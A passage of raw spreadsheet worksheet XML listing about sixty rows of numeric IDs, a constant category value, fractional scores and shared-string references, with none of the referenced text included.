      </c>
      <c r="H7197" t="s">
        <v>14240</v>
      </c>
    </row>
    <row r="7198" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7198" s="1">
        <v>7196</v>
      </c>
      <c r="B7198">
        <v>6172</v>
      </c>
      <c r="C7198">
        <v>6172</v>
      </c>
      <c r="D7198">
        <v>4</v>
      </c>
      <c r="E7198">
        <v>0.66269999742507935</v>
      </c>
      <c r="F7198" t="s">
        <v>13461</v>
      </c>
      <c r="G7198" t="s">
        <v>14241</v>
      </c>
      <c r="H7198" t="s">
        <v>14242</v>
      </c>
    </row>
    <row r="7199" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7199" s="1">
        <v>7197</v>
      </c>
      <c r="B7199">
        <v>4173</v>
      </c>
      <c r="C7199">
        <v>4173</v>
      </c>
      <c r="D7199">
        <v>4</v>
      </c>
      <c r="E7199">
        <v>0.53850001096725464</v>
      </c>
      <c r="F7199" t="s">
        <v>13461</v>
      </c>
      <c r="G7199" t="s">
        <v>14243</v>
      </c>
      <c r="H7199" t="s">
        <v>14244</v>
      </c>
    </row>
    <row r="7200" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7200" s="1">
        <v>7198</v>
      </c>
      <c r="B7200">
        <v>4235</v>
      </c>
      <c r="C7200">
        <v>4235</v>
      </c>
      <c r="D7200">
        <v>4</v>
      </c>
      <c r="E7200">
        <v>0.44650000333786011</v>
      </c>
      <c r="F7200" t="s">
        <v>13461</v>
      </c>
      <c r="G7200" t="s">
        <v>14245</v>
      </c>
      <c r="H7200" t="s">
        <v>14246</v>
      </c>
    </row>
    <row r="7201" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7201" s="1">
        <v>7199</v>
      </c>
      <c r="B7201">
        <v>4177</v>
      </c>
      <c r="C7201">
        <v>4177</v>
      </c>
      <c r="D7201">
        <v>4</v>
      </c>
      <c r="E7201">
        <v>0.93500000238418579</v>
      </c>
      <c r="F7201" t="s">
        <v>13461</v>
      </c>
      <c r="G7201" t="s">
        <v>14247</v>
      </c>
      <c r="H7201" t="s">
        <v>14248</v>
      </c>
    </row>
    <row r="7202" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7202" s="1">
        <v>7200</v>
      </c>
      <c r="B7202">
        <v>4184</v>
      </c>
      <c r="C7202">
        <v>4184</v>
      </c>
      <c r="D7202">
        <v>4</v>
      </c>
      <c r="E7202">
        <v>0.90210002660751343</v>
      </c>
      <c r="F7202" t="s">
        <v>13461</v>
      </c>
      <c r="G7202" t="s">
        <v>14249</v>
      </c>
      <c r="H7202" t="s">
        <v>14250</v>
      </c>
    </row>
    <row r="7203" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7203" s="1">
        <v>7201</v>
      </c>
      <c r="B7203">
        <v>4185</v>
      </c>
      <c r="C7203">
        <v>4185</v>
      </c>
      <c r="D7203">
        <v>4</v>
      </c>
      <c r="E7203">
        <v>0.9869999885559082</v>
      </c>
      <c r="F7203" t="s">
        <v>13461</v>
      </c>
      <c r="G7203" t="s">
        <v>14251</v>
      </c>
      <c r="H7203" t="s">
        <v>14252</v>
      </c>
    </row>
    <row r="7204" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7204" s="1">
        <v>7202</v>
      </c>
      <c r="B7204">
        <v>4186</v>
      </c>
      <c r="C7204">
        <v>4186</v>
      </c>
      <c r="D7204">
        <v>4</v>
      </c>
      <c r="E7204">
        <v>0.89099997282028198</v>
      </c>
      <c r="F7204" t="s">
        <v>13461</v>
      </c>
      <c r="G7204" t="s">
        <v>14253</v>
      </c>
      <c r="H7204" t="s">
        <v>14254</v>
      </c>
    </row>
    <row r="7205" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7205" s="1">
        <v>7203</v>
      </c>
      <c r="B7205">
        <v>4196</v>
      </c>
      <c r="C7205">
        <v>4196</v>
      </c>
      <c r="D7205">
        <v>4</v>
      </c>
      <c r="E7205">
        <v>0.94950002431869507</v>
      </c>
      <c r="F7205" t="s">
        <v>13461</v>
      </c>
      <c r="G7205" t="s">
        <v>14255</v>
      </c>
      <c r="H7205" t="s">
        <v>14256</v>
      </c>
    </row>
    <row r="7206" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7206" s="1">
        <v>7204</v>
      </c>
      <c r="B7206">
        <v>4199</v>
      </c>
      <c r="C7206">
        <v>4199</v>
      </c>
      <c r="D7206">
        <v>4</v>
      </c>
      <c r="E7206">
        <v>0.99659997224807739</v>
      </c>
      <c r="F7206" t="s">
        <v>13461</v>
      </c>
      <c r="G7206" t="s">
        <v>14257</v>
      </c>
      <c r="H7206" t="s">
        <v>14258</v>
      </c>
    </row>
    <row r="7207" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7207" s="1">
        <v>7205</v>
      </c>
      <c r="B7207">
        <v>6157</v>
      </c>
      <c r="C7207">
        <v>6157</v>
      </c>
      <c r="D7207">
        <v>4</v>
      </c>
      <c r="E7207">
        <v>0.35199999809265142</v>
      </c>
      <c r="F7207" t="s">
        <v>13461</v>
      </c>
      <c r="G7207" t="s">
        <v>14259</v>
      </c>
      <c r="H7207" t="s">
        <v>14260</v>
      </c>
    </row>
    <row r="7208" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7208" s="1">
        <v>7206</v>
      </c>
      <c r="B7208">
        <v>6155</v>
      </c>
      <c r="C7208">
        <v>6155</v>
      </c>
      <c r="D7208">
        <v>4</v>
      </c>
      <c r="E7208">
        <v>0.99290001392364502</v>
      </c>
      <c r="F7208" t="s">
        <v>13461</v>
      </c>
      <c r="G7208" t="s">
        <v>14261</v>
      </c>
      <c r="H7208" t="s">
        <v>14262</v>
      </c>
    </row>
    <row r="7209" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7209" s="1">
        <v>7207</v>
      </c>
      <c r="B7209">
        <v>4213</v>
      </c>
      <c r="C7209">
        <v>4213</v>
      </c>
      <c r="D7209">
        <v>4</v>
      </c>
      <c r="E7209">
        <v>0.68229997158050537</v>
      </c>
      <c r="F7209" t="s">
        <v>13461</v>
      </c>
      <c r="G7209" t="s">
        <v>14263</v>
      </c>
      <c r="H7209" t="s">
        <v>14264</v>
      </c>
    </row>
    <row r="7210" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7210" s="1">
        <v>7208</v>
      </c>
      <c r="B7210">
        <v>6150</v>
      </c>
      <c r="C7210">
        <v>6150</v>
      </c>
      <c r="D7210">
        <v>4</v>
      </c>
      <c r="E7210">
        <v>0.87080001831054688</v>
      </c>
      <c r="F7210" t="s">
        <v>13461</v>
      </c>
      <c r="G7210" t="s">
        <v>14265</v>
      </c>
      <c r="H7210" t="s">
        <v>14266</v>
      </c>
    </row>
    <row r="7211" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7211" s="1">
        <v>7209</v>
      </c>
      <c r="B7211">
        <v>6165</v>
      </c>
      <c r="C7211">
        <v>6165</v>
      </c>
      <c r="D7211">
        <v>4</v>
      </c>
      <c r="E7211">
        <v>0.65499997138977051</v>
      </c>
      <c r="F7211" t="s">
        <v>13461</v>
      </c>
      <c r="G7211" t="s">
        <v>14267</v>
      </c>
      <c r="H7211" t="s">
        <v>14268</v>
      </c>
    </row>
    <row r="7212" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7212" s="1">
        <v>7210</v>
      </c>
      <c r="B7212">
        <v>4088</v>
      </c>
      <c r="C7212">
        <v>4088</v>
      </c>
      <c r="D7212">
        <v>4</v>
      </c>
      <c r="E7212">
        <v>0.65820002555847168</v>
      </c>
      <c r="F7212" t="s">
        <v>13461</v>
      </c>
      <c r="G7212" t="s">
        <v>14269</v>
      </c>
      <c r="H7212" t="s">
        <v>14270</v>
      </c>
    </row>
    <row r="7213" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7213" s="1">
        <v>7211</v>
      </c>
      <c r="B7213">
        <v>4312</v>
      </c>
      <c r="C7213">
        <v>4312</v>
      </c>
      <c r="D7213">
        <v>4</v>
      </c>
      <c r="E7213">
        <v>0.57169997692108154</v>
      </c>
      <c r="F7213" t="s">
        <v>13461</v>
      </c>
      <c r="G7213" t="s">
        <v>14271</v>
      </c>
      <c r="H7213" t="s">
        <v>14272</v>
      </c>
    </row>
    <row r="7214" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7214" s="1">
        <v>7212</v>
      </c>
      <c r="B7214">
        <v>6095</v>
      </c>
      <c r="C7214">
        <v>6095</v>
      </c>
      <c r="D7214">
        <v>4</v>
      </c>
      <c r="E7214">
        <v>0.83139997720718384</v>
      </c>
      <c r="F7214" t="s">
        <v>13461</v>
      </c>
      <c r="G7214" t="s">
        <v>14273</v>
      </c>
      <c r="H7214" t="s">
        <v>14274</v>
      </c>
    </row>
    <row r="7215" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7215" s="1">
        <v>7213</v>
      </c>
      <c r="B7215">
        <v>4432</v>
      </c>
      <c r="C7215">
        <v>4432</v>
      </c>
      <c r="D7215">
        <v>4</v>
      </c>
      <c r="E7215">
        <v>0.71130001544952393</v>
      </c>
      <c r="F7215" t="s">
        <v>13461</v>
      </c>
      <c r="G7215" t="s">
        <v>14275</v>
      </c>
      <c r="H7215" t="s">
        <v>14276</v>
      </c>
    </row>
    <row r="7216" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7216" s="1">
        <v>7214</v>
      </c>
      <c r="B7216">
        <v>4434</v>
      </c>
      <c r="C7216">
        <v>4434</v>
      </c>
      <c r="D7216">
        <v>4</v>
      </c>
      <c r="E7216">
        <v>0.94630002975463867</v>
      </c>
      <c r="F7216" t="s">
        <v>13461</v>
      </c>
      <c r="G7216" t="s">
        <v>14277</v>
      </c>
      <c r="H7216" t="s">
        <v>14278</v>
      </c>
    </row>
    <row r="7217" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7217" s="1">
        <v>7215</v>
      </c>
      <c r="B7217">
        <v>6033</v>
      </c>
      <c r="C7217">
        <v>6033</v>
      </c>
      <c r="D7217">
        <v>4</v>
      </c>
      <c r="E7217">
        <v>0.55010002851486206</v>
      </c>
      <c r="F7217" t="s">
        <v>13461</v>
      </c>
      <c r="G7217" t="s">
        <v>14279</v>
      </c>
      <c r="H7217" t="s">
        <v>14280</v>
      </c>
    </row>
    <row r="7218" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7218" s="1">
        <v>7216</v>
      </c>
      <c r="B7218">
        <v>4436</v>
      </c>
      <c r="C7218">
        <v>4436</v>
      </c>
      <c r="D7218">
        <v>4</v>
      </c>
      <c r="E7218">
        <v>0.99470001459121704</v>
      </c>
      <c r="F7218" t="s">
        <v>13461</v>
      </c>
      <c r="G7218" t="s">
        <v>14281</v>
      </c>
      <c r="H7218" t="s">
        <v>14282</v>
      </c>
    </row>
    <row r="7219" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7219" s="1">
        <v>7217</v>
      </c>
      <c r="B7219">
        <v>6030</v>
      </c>
      <c r="C7219">
        <v>6030</v>
      </c>
      <c r="D7219">
        <v>4</v>
      </c>
      <c r="E7219">
        <v>0.9966999888420105</v>
      </c>
      <c r="F7219" t="s">
        <v>13461</v>
      </c>
      <c r="G7219" t="s">
        <v>14283</v>
      </c>
      <c r="H7219" t="s">
        <v>14284</v>
      </c>
    </row>
    <row r="7220" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7220" s="1">
        <v>7218</v>
      </c>
      <c r="B7220">
        <v>4438</v>
      </c>
      <c r="C7220">
        <v>4438</v>
      </c>
      <c r="D7220">
        <v>4</v>
      </c>
      <c r="E7220">
        <v>0.61549997329711914</v>
      </c>
      <c r="F7220" t="s">
        <v>13461</v>
      </c>
      <c r="G7220" t="s">
        <v>14285</v>
      </c>
      <c r="H7220" t="s">
        <v>14286</v>
      </c>
    </row>
    <row r="7221" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7221" s="1">
        <v>7219</v>
      </c>
      <c r="B7221">
        <v>4480</v>
      </c>
      <c r="C7221">
        <v>4480</v>
      </c>
      <c r="D7221">
        <v>4</v>
      </c>
      <c r="E7221">
        <v>0.96670001745223999</v>
      </c>
      <c r="F7221" t="s">
        <v>13461</v>
      </c>
      <c r="G7221" t="s">
        <v>14287</v>
      </c>
      <c r="H7221" t="s">
        <v>14288</v>
      </c>
    </row>
    <row r="7222" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7222" s="1">
        <v>7220</v>
      </c>
      <c r="B7222">
        <v>6016</v>
      </c>
      <c r="C7222">
        <v>6016</v>
      </c>
      <c r="D7222">
        <v>4</v>
      </c>
      <c r="E7222">
        <v>0.68809998035430908</v>
      </c>
      <c r="F7222" t="s">
        <v>13461</v>
      </c>
      <c r="G7222" t="s">
        <v>14289</v>
      </c>
      <c r="H7222" t="s">
        <v>14290</v>
      </c>
    </row>
    <row r="7223" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7223" s="1">
        <v>7221</v>
      </c>
      <c r="B7223">
        <v>4482</v>
      </c>
      <c r="C7223">
        <v>4482</v>
      </c>
      <c r="D7223">
        <v>4</v>
      </c>
      <c r="E7223">
        <v>0.76010000705718994</v>
      </c>
      <c r="F7223" t="s">
        <v>13461</v>
      </c>
      <c r="G7223" t="s">
        <v>14291</v>
      </c>
      <c r="H7223" t="s">
        <v>14292</v>
      </c>
    </row>
    <row r="7224" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7224" s="1">
        <v>7222</v>
      </c>
      <c r="B7224">
        <v>6037</v>
      </c>
      <c r="C7224">
        <v>6037</v>
      </c>
      <c r="D7224">
        <v>4</v>
      </c>
      <c r="E7224">
        <v>0.86169999837875366</v>
      </c>
      <c r="F7224" t="s">
        <v>13461</v>
      </c>
      <c r="G7224" t="s">
        <v>14293</v>
      </c>
      <c r="H7224" t="s">
        <v>14294</v>
      </c>
    </row>
    <row r="7225" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7225" s="1">
        <v>7223</v>
      </c>
      <c r="B7225">
        <v>4485</v>
      </c>
      <c r="C7225">
        <v>4485</v>
      </c>
      <c r="D7225">
        <v>4</v>
      </c>
      <c r="E7225">
        <v>0.44710001349449158</v>
      </c>
      <c r="F7225" t="s">
        <v>13461</v>
      </c>
      <c r="G7225" t="s">
        <v>14295</v>
      </c>
      <c r="H7225" t="s">
        <v>14296</v>
      </c>
    </row>
    <row r="7226" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7226" s="1">
        <v>7224</v>
      </c>
      <c r="B7226">
        <v>6009</v>
      </c>
      <c r="C7226">
        <v>6009</v>
      </c>
      <c r="D7226">
        <v>4</v>
      </c>
      <c r="E7226">
        <v>0.51999998092651367</v>
      </c>
      <c r="F7226" t="s">
        <v>13461</v>
      </c>
      <c r="G7226" t="s">
        <v>14297</v>
      </c>
      <c r="H7226" t="s">
        <v>14298</v>
      </c>
    </row>
    <row r="7227" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7227" s="1">
        <v>7225</v>
      </c>
      <c r="B7227">
        <v>6008</v>
      </c>
      <c r="C7227">
        <v>6008</v>
      </c>
      <c r="D7227">
        <v>4</v>
      </c>
      <c r="E7227">
        <v>0.99970000982284546</v>
      </c>
      <c r="F7227" t="s">
        <v>13461</v>
      </c>
      <c r="G7227" t="s">
        <v>14299</v>
      </c>
      <c r="H7227" t="s">
        <v>14300</v>
      </c>
    </row>
    <row r="7228" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7228" s="1">
        <v>7226</v>
      </c>
      <c r="B7228">
        <v>6006</v>
      </c>
      <c r="C7228">
        <v>6006</v>
      </c>
      <c r="D7228">
        <v>4</v>
      </c>
      <c r="E7228">
        <v>0.99519997835159302</v>
      </c>
      <c r="F7228" t="s">
        <v>13461</v>
      </c>
      <c r="G7228" t="s">
        <v>14301</v>
      </c>
      <c r="H7228" t="s">
        <v>14302</v>
      </c>
    </row>
    <row r="7229" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7229" s="1">
        <v>7227</v>
      </c>
      <c r="B7229">
        <v>6003</v>
      </c>
      <c r="C7229">
        <v>6003</v>
      </c>
      <c r="D7229">
        <v>4</v>
      </c>
      <c r="E7229">
        <v>0.99570000171661377</v>
      </c>
      <c r="F7229" t="s">
        <v>13461</v>
      </c>
      <c r="G7229" t="s">
        <v>14303</v>
      </c>
      <c r="H7229" t="s">
        <v>14304</v>
      </c>
    </row>
    <row r="7230" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7230" s="1">
        <v>7228</v>
      </c>
      <c r="B7230">
        <v>4501</v>
      </c>
      <c r="C7230">
        <v>4501</v>
      </c>
      <c r="D7230">
        <v>4</v>
      </c>
      <c r="E7230">
        <v>0.64440000057220459</v>
      </c>
      <c r="F7230" t="s">
        <v>13461</v>
      </c>
      <c r="G7230" t="s">
        <v>14305</v>
      </c>
      <c r="H7230" t="s">
        <v>14306</v>
      </c>
    </row>
    <row r="7231" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7231" s="1">
        <v>7229</v>
      </c>
      <c r="B7231">
        <v>4502</v>
      </c>
      <c r="C7231">
        <v>4502</v>
      </c>
      <c r="D7231">
        <v>4</v>
      </c>
      <c r="E7231">
        <v>0.65329998731613159</v>
      </c>
      <c r="F7231" t="s">
        <v>13461</v>
      </c>
      <c r="G7231" t="s">
        <v>14307</v>
      </c>
      <c r="H7231" t="s">
        <v>14308</v>
      </c>
    </row>
    <row r="7232" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7232" s="1">
        <v>7230</v>
      </c>
      <c r="B7232">
        <v>4504</v>
      </c>
      <c r="C7232">
        <v>4504</v>
      </c>
      <c r="D7232">
        <v>4</v>
      </c>
      <c r="E7232">
        <v>0.95499998331069946</v>
      </c>
      <c r="F7232" t="s">
        <v>13461</v>
      </c>
      <c r="G7232" t="s">
        <v>14309</v>
      </c>
      <c r="H7232" t="s">
        <v>14310</v>
      </c>
    </row>
    <row r="7233" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7233" s="1">
        <v>7231</v>
      </c>
      <c r="B7233">
        <v>5994</v>
      </c>
      <c r="C7233">
        <v>5994</v>
      </c>
      <c r="D7233">
        <v>4</v>
      </c>
      <c r="E7233">
        <v>0.95759999752044678</v>
      </c>
      <c r="F7233" t="s">
        <v>13461</v>
      </c>
      <c r="G7233" t="s">
        <v>14311</v>
      </c>
      <c r="H7233" t="s">
        <v>14312</v>
      </c>
    </row>
    <row r="7234" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7234" s="1">
        <v>7232</v>
      </c>
      <c r="B7234">
        <v>4515</v>
      </c>
      <c r="C7234">
        <v>4515</v>
      </c>
      <c r="D7234">
        <v>4</v>
      </c>
      <c r="E7234">
        <v>0.62650001049041748</v>
      </c>
      <c r="F7234" t="s">
        <v>13461</v>
      </c>
      <c r="G7234" t="s">
        <v>14313</v>
      </c>
      <c r="H7234" t="s">
        <v>14314</v>
      </c>
    </row>
    <row r="7235" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7235" s="1">
        <v>7233</v>
      </c>
      <c r="B7235">
        <v>6011</v>
      </c>
      <c r="C7235">
        <v>6011</v>
      </c>
      <c r="D7235">
        <v>4</v>
      </c>
      <c r="E7235">
        <v>0.70630002021789551</v>
      </c>
      <c r="F7235" t="s">
        <v>13461</v>
      </c>
      <c r="G7235" t="s">
        <v>14315</v>
      </c>
      <c r="H7235" t="s">
        <v>14316</v>
      </c>
    </row>
    <row r="7236" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7236" s="1">
        <v>7234</v>
      </c>
      <c r="B7236">
        <v>4313</v>
      </c>
      <c r="C7236">
        <v>4313</v>
      </c>
      <c r="D7236">
        <v>4</v>
      </c>
      <c r="E7236">
        <v>0.77880001068115234</v>
      </c>
      <c r="F7236" t="s">
        <v>13461</v>
      </c>
      <c r="G7236" t="s">
        <v>14317</v>
      </c>
      <c r="H7236" t="s">
        <v>14318</v>
      </c>
    </row>
    <row r="7237" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7237" s="1">
        <v>7235</v>
      </c>
      <c r="B7237">
        <v>6046</v>
      </c>
      <c r="C7237">
        <v>6046</v>
      </c>
      <c r="D7237">
        <v>4</v>
      </c>
      <c r="E7237">
        <v>0.84899997711181641</v>
      </c>
      <c r="F7237" t="s">
        <v>13461</v>
      </c>
      <c r="G7237" t="s">
        <v>14319</v>
      </c>
      <c r="H7237" t="s">
        <v>14320</v>
      </c>
    </row>
    <row r="7238" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7238" s="1">
        <v>7236</v>
      </c>
      <c r="B7238">
        <v>4408</v>
      </c>
      <c r="C7238">
        <v>4408</v>
      </c>
      <c r="D7238">
        <v>4</v>
      </c>
      <c r="E7238">
        <v>0.57940000295639038</v>
      </c>
      <c r="F7238" t="s">
        <v>13461</v>
      </c>
      <c r="G7238" t="s">
        <v>14321</v>
      </c>
      <c r="H7238" t="s">
        <v>14322</v>
      </c>
    </row>
    <row r="7239" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7239" s="1">
        <v>7237</v>
      </c>
      <c r="B7239">
        <v>6094</v>
      </c>
      <c r="C7239">
        <v>6094</v>
      </c>
      <c r="D7239">
        <v>4</v>
      </c>
      <c r="E7239">
        <v>0.80510002374649048</v>
      </c>
      <c r="F7239" t="s">
        <v>13461</v>
      </c>
      <c r="G7239" t="s">
        <v>14323</v>
      </c>
      <c r="H7239" t="s">
        <v>14324</v>
      </c>
    </row>
    <row r="7240" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7240" s="1">
        <v>7238</v>
      </c>
      <c r="B7240">
        <v>6093</v>
      </c>
      <c r="C7240">
        <v>6093</v>
      </c>
      <c r="D7240">
        <v>4</v>
      </c>
      <c r="E7240">
        <v>0.98329997062683105</v>
      </c>
      <c r="F7240" t="s">
        <v>13461</v>
      </c>
      <c r="G7240" t="s">
        <v>14325</v>
      </c>
      <c r="H7240" t="s">
        <v>14326</v>
      </c>
    </row>
    <row r="7241" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7241" s="1">
        <v>7239</v>
      </c>
      <c r="B7241">
        <v>6092</v>
      </c>
      <c r="C7241">
        <v>6092</v>
      </c>
      <c r="D7241">
        <v>4</v>
      </c>
      <c r="E7241">
        <v>0.80510002374649048</v>
      </c>
      <c r="F7241" t="s">
        <v>13461</v>
      </c>
      <c r="G7241" t="s">
        <v>14327</v>
      </c>
      <c r="H7241" t="s">
        <v>14324</v>
      </c>
    </row>
    <row r="7242" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7242" s="1">
        <v>7240</v>
      </c>
      <c r="B7242">
        <v>6091</v>
      </c>
      <c r="C7242">
        <v>6091</v>
      </c>
      <c r="D7242">
        <v>4</v>
      </c>
      <c r="E7242">
        <v>0.91519999504089355</v>
      </c>
      <c r="F7242" t="s">
        <v>13461</v>
      </c>
      <c r="G7242" t="s">
        <v>14328</v>
      </c>
      <c r="H7242" t="s">
        <v>14329</v>
      </c>
    </row>
    <row r="7243" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7243" s="1">
        <v>7241</v>
      </c>
      <c r="B7243">
        <v>6090</v>
      </c>
      <c r="C7243">
        <v>6090</v>
      </c>
      <c r="D7243">
        <v>4</v>
      </c>
      <c r="E7243">
        <v>0.99900001287460327</v>
      </c>
      <c r="F7243" t="s">
        <v>13461</v>
      </c>
      <c r="G7243" t="s">
        <v>14330</v>
      </c>
      <c r="H7243" t="s">
        <v>14331</v>
      </c>
    </row>
    <row r="7244" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7244" s="1">
        <v>7242</v>
      </c>
      <c r="B7244">
        <v>6086</v>
      </c>
      <c r="C7244">
        <v>6086</v>
      </c>
      <c r="D7244">
        <v>4</v>
      </c>
      <c r="E7244">
        <v>0.54350000619888306</v>
      </c>
      <c r="F7244" t="s">
        <v>13461</v>
      </c>
      <c r="G7244" t="s">
        <v>14332</v>
      </c>
      <c r="H7244" t="s">
        <v>14333</v>
      </c>
    </row>
    <row r="7245" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7245" s="1">
        <v>7243</v>
      </c>
      <c r="B7245">
        <v>4322</v>
      </c>
      <c r="C7245">
        <v>4322</v>
      </c>
      <c r="D7245">
        <v>4</v>
      </c>
      <c r="E7245">
        <v>0.60979998111724854</v>
      </c>
      <c r="F7245" t="s">
        <v>13461</v>
      </c>
      <c r="G7245" t="s">
        <v>14334</v>
      </c>
      <c r="H7245" t="s">
        <v>14335</v>
      </c>
    </row>
    <row r="7246" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7246" s="1">
        <v>7244</v>
      </c>
      <c r="B7246">
        <v>6084</v>
      </c>
      <c r="C7246">
        <v>6084</v>
      </c>
      <c r="D7246">
        <v>4</v>
      </c>
      <c r="E7246">
        <v>0.54600000381469727</v>
      </c>
      <c r="F7246" t="s">
        <v>13461</v>
      </c>
      <c r="G7246" t="s">
        <v>14336</v>
      </c>
      <c r="H7246" t="s">
        <v>14337</v>
      </c>
    </row>
    <row r="7247" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7247" s="1">
        <v>7245</v>
      </c>
      <c r="B7247">
        <v>4337</v>
      </c>
      <c r="C7247">
        <v>4337</v>
      </c>
      <c r="D7247">
        <v>4</v>
      </c>
      <c r="E7247">
        <v>0.65490001440048218</v>
      </c>
      <c r="F7247" t="s">
        <v>13461</v>
      </c>
      <c r="G7247" t="s">
        <v>14338</v>
      </c>
      <c r="H7247" t="s">
        <v>14339</v>
      </c>
    </row>
    <row r="7248" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7248" s="1">
        <v>7246</v>
      </c>
      <c r="B7248">
        <v>4409</v>
      </c>
      <c r="C7248">
        <v>4409</v>
      </c>
      <c r="D7248">
        <v>4</v>
      </c>
      <c r="E7248">
        <v>0.54519999027252197</v>
      </c>
      <c r="F7248" t="s">
        <v>13461</v>
      </c>
      <c r="G7248" t="s">
        <v>14340</v>
      </c>
      <c r="H7248" t="s">
        <v>14341</v>
      </c>
    </row>
    <row r="7249" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7249" s="1">
        <v>7247</v>
      </c>
      <c r="B7249">
        <v>6072</v>
      </c>
      <c r="C7249">
        <v>6072</v>
      </c>
      <c r="D7249">
        <v>4</v>
      </c>
      <c r="E7249">
        <v>0.9846000075340271</v>
      </c>
      <c r="F7249" t="s">
        <v>13461</v>
      </c>
      <c r="G7249" t="s">
        <v>14342</v>
      </c>
      <c r="H7249" t="s">
        <v>14343</v>
      </c>
    </row>
    <row r="7250" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7250" s="1">
        <v>7248</v>
      </c>
      <c r="B7250">
        <v>6069</v>
      </c>
      <c r="C7250">
        <v>6069</v>
      </c>
      <c r="D7250">
        <v>4</v>
      </c>
      <c r="E7250">
        <v>0.91390001773834229</v>
      </c>
      <c r="F7250" t="s">
        <v>13461</v>
      </c>
      <c r="G7250" t="s">
        <v>14344</v>
      </c>
      <c r="H7250" t="s">
        <v>14345</v>
      </c>
    </row>
    <row r="7251" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7251" s="1">
        <v>7249</v>
      </c>
      <c r="B7251">
        <v>4367</v>
      </c>
      <c r="C7251">
        <v>4367</v>
      </c>
      <c r="D7251">
        <v>4</v>
      </c>
      <c r="E7251">
        <v>0.50720000267028809</v>
      </c>
      <c r="F7251" t="s">
        <v>13461</v>
      </c>
      <c r="G7251" t="s">
        <v>14346</v>
      </c>
      <c r="H7251" t="s">
        <v>14347</v>
      </c>
    </row>
    <row r="7252" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7252" s="1">
        <v>7250</v>
      </c>
      <c r="B7252">
        <v>4369</v>
      </c>
      <c r="C7252">
        <v>4369</v>
      </c>
      <c r="D7252">
        <v>4</v>
      </c>
      <c r="E7252">
        <v>0.61629998683929443</v>
      </c>
      <c r="F7252" t="s">
        <v>13461</v>
      </c>
      <c r="G7252" t="s">
        <v>14348</v>
      </c>
      <c r="H7252" t="s">
        <v>14349</v>
      </c>
    </row>
    <row r="7253" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7253" s="1">
        <v>7251</v>
      </c>
      <c r="B7253">
        <v>4374</v>
      </c>
      <c r="C7253">
        <v>4374</v>
      </c>
      <c r="D7253">
        <v>4</v>
      </c>
      <c r="E7253">
        <v>0.82749998569488525</v>
      </c>
      <c r="F7253" t="s">
        <v>13461</v>
      </c>
      <c r="G7253" t="s">
        <v>14350</v>
      </c>
      <c r="H7253" t="s">
        <v>14351</v>
      </c>
    </row>
    <row r="7254" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7254" s="1">
        <v>7252</v>
      </c>
      <c r="B7254">
        <v>4375</v>
      </c>
      <c r="C7254">
        <v>4375</v>
      </c>
      <c r="D7254">
        <v>4</v>
      </c>
      <c r="E7254">
        <v>0.85210001468658447</v>
      </c>
      <c r="F7254" t="s">
        <v>13461</v>
      </c>
      <c r="G7254" t="s">
        <v>14352</v>
      </c>
      <c r="H7254" t="s">
        <v>14353</v>
      </c>
    </row>
    <row r="7255" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7255" s="1">
        <v>7253</v>
      </c>
      <c r="B7255">
        <v>4391</v>
      </c>
      <c r="C7255">
        <v>4391</v>
      </c>
      <c r="D7255">
        <v>4</v>
      </c>
      <c r="E7255">
        <v>0.93409997224807739</v>
      </c>
      <c r="F7255" t="s">
        <v>13461</v>
      </c>
      <c r="G7255" t="s">
        <v>14354</v>
      </c>
      <c r="H7255" t="s">
        <v>14355</v>
      </c>
    </row>
    <row r="7256" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7256" s="1">
        <v>7254</v>
